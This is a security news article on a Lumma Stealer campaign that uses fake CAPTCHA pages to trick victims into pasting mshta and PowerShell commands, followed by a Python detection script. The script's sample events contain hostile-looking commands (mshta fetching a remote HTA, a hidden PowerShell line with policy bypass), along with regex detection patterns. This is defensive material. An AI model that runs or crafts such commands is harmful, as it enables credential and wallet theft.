January 24, 2025

Hackers Exploit Fake CAPTCHA to Spread Lumma Stealer Globally


Cybersecurity researchers have uncovered a sophisticated malware campaign that leverages fake CAPTCHA verification pages to distribute the Lumma Stealer information-stealing malware across multiple industries and countries worldwide.

Netskope Threat Labs discovered the global campaign targeting organizations in Argentina, Colombia, the United States, the Philippines, and other regions. The attack primarily impacts industries including healthcare, banking, marketing, and telecommunications, with the telecom sector experiencing the highest number of targeted organizations.

The intricate attack chain begins when victims visit a compromised website that redirects them to a deceptive CAPTCHA page. These fake verification pages are designed to trick users into executing a malicious command through the Windows Run prompt. By using the native mshta.exe binary, the attackers download and execute a harmful HTA file from a remote server.

Attack Chain

Researchers noted that the campaign represents an evolution of previous social engineering techniques. The fake CAPTCHA pages include a JavaScript snippet that silently copies a malicious PowerShell command to the user's clipboard. Users are then instructed to paste and execute the command, unknowingly initiating the malware infection process.

The Lumma Stealer, operating on a malware-as-a-service (MaaS) model, demonstrates remarkable flexibility in its delivery methods. Once executed, the malware can steal a wide range of sensitive information, including browser credentials, cryptocurrency wallet details, cookies, and other critical data from multiple browsers such as Google Chrome, Microsoft Edge, and Mozilla Firefox.

Security experts highlight the campaign's sophisticated approach to evading detection. The malware employs multiple techniques to bypass security controls, including process hollowing and PowerShell one-liners. Additionally, the attackers use obfuscation methods to make analysis more challenging.

The infection process involves several stages. After the initial command executes, a series of PowerShell scripts is downloaded and run, ultimately installing the Lumma Stealer payload. Notably, the malware attempts to bypass the Windows Antimalware Scan Interface (AMSI), further complicating detection.
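The chain described above (a command pasted into the Run prompt that launches mshta.exe against a remote HTA, followed by PowerShell one-liners) leaves a recognisable process-creation footprint. The following is an added example written for this article, not code from Netskope or the original post: it runs two simple detection rules over constructed Sysmon-style process-creation events. The field names, the sample events and the hostnames under `.example` are all assumptions made for the demonstration.

```python
import re

# Constructed Sysmon-style process-creation events (Event ID 1, trimmed to the
# fields the rules need). The first two mimic the fake-CAPTCHA chain; the rest are benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe https://captcha-verify.example/check.hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -w hidden -ep bypass -c "<pasted one-liner>"'},
    {"ParentImage": r"C:\Program Files\LegacyApp\app.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\LegacyApp\help.hta"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
]

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Switches typical of pasted one-liners: hidden window, bypassed policy, encoded command.
PS_SUSPICIOUS = re.compile(
    r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-e(nc|ncodedcommand)\s",
    re.IGNORECASE)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the name of the matching rule, or None if the event looks benign."""
    parent, image = basename(event["ParentImage"]), basename(event["Image"])
    cmd = event["CommandLine"]
    # A command typed into the Run prompt (Win+R) is spawned by explorer.exe, which is
    # exactly how the fake CAPTCHA gets the clipboard contents executed.
    if parent != "explorer.exe":
        return None
    if image == "mshta.exe" and REMOTE_URL.search(cmd):
        return "mshta_remote_hta_from_run_prompt"
    if image in ("powershell.exe", "pwsh.exe") and PS_SUSPICIOUS.search(cmd):
        return "powershell_oneliner_from_run_prompt"
    return None

def detect(events):
    """Return [(index, rule)] for every event that matches a rule."""
    return [(i, classify(ev)) for i, ev in enumerate(events) if classify(ev)]

if __name__ == "__main__":
    for idx, rule in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {rule} :: {SAMPLE_EVENTS[idx]['CommandLine']}")
```

explorer.exe is also the parent of anything launched from the desktop or Start menu, so in production these rules should be correlated with the user's preceding browser activity and tuned against your own baseline of legitimate mshta.exe and PowerShell usage.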

Netskope researchers warn that this campaign represents a significant threat to organizations across various industries. The global nature of the attack and its ability to target multiple sectors make it particularly dangerous. Organizations are advised to implement robust security measures, including employee training on recognizing fake CAPTCHA pages and advanced threat detection systems.

As cybercriminals continue to develop more sophisticated social engineering techniques, security professionals must remain vigilant and adaptive. The Lumma Stealer campaign serves as a stark reminder of the evolving tactics used by threat actors to compromise systems and steal sensitive information.

Anthony Denis

Anthony Denis is a Security News Reporter with a Bachelor's in Business Computer Application. Drawing from a decade of digital media marketing experience and two years of freelance writing, he brings technical expertise to cybersecurity journalism. His background in IT, content creation, and social media management enables him to deliver complex security topics with clarity and insight.
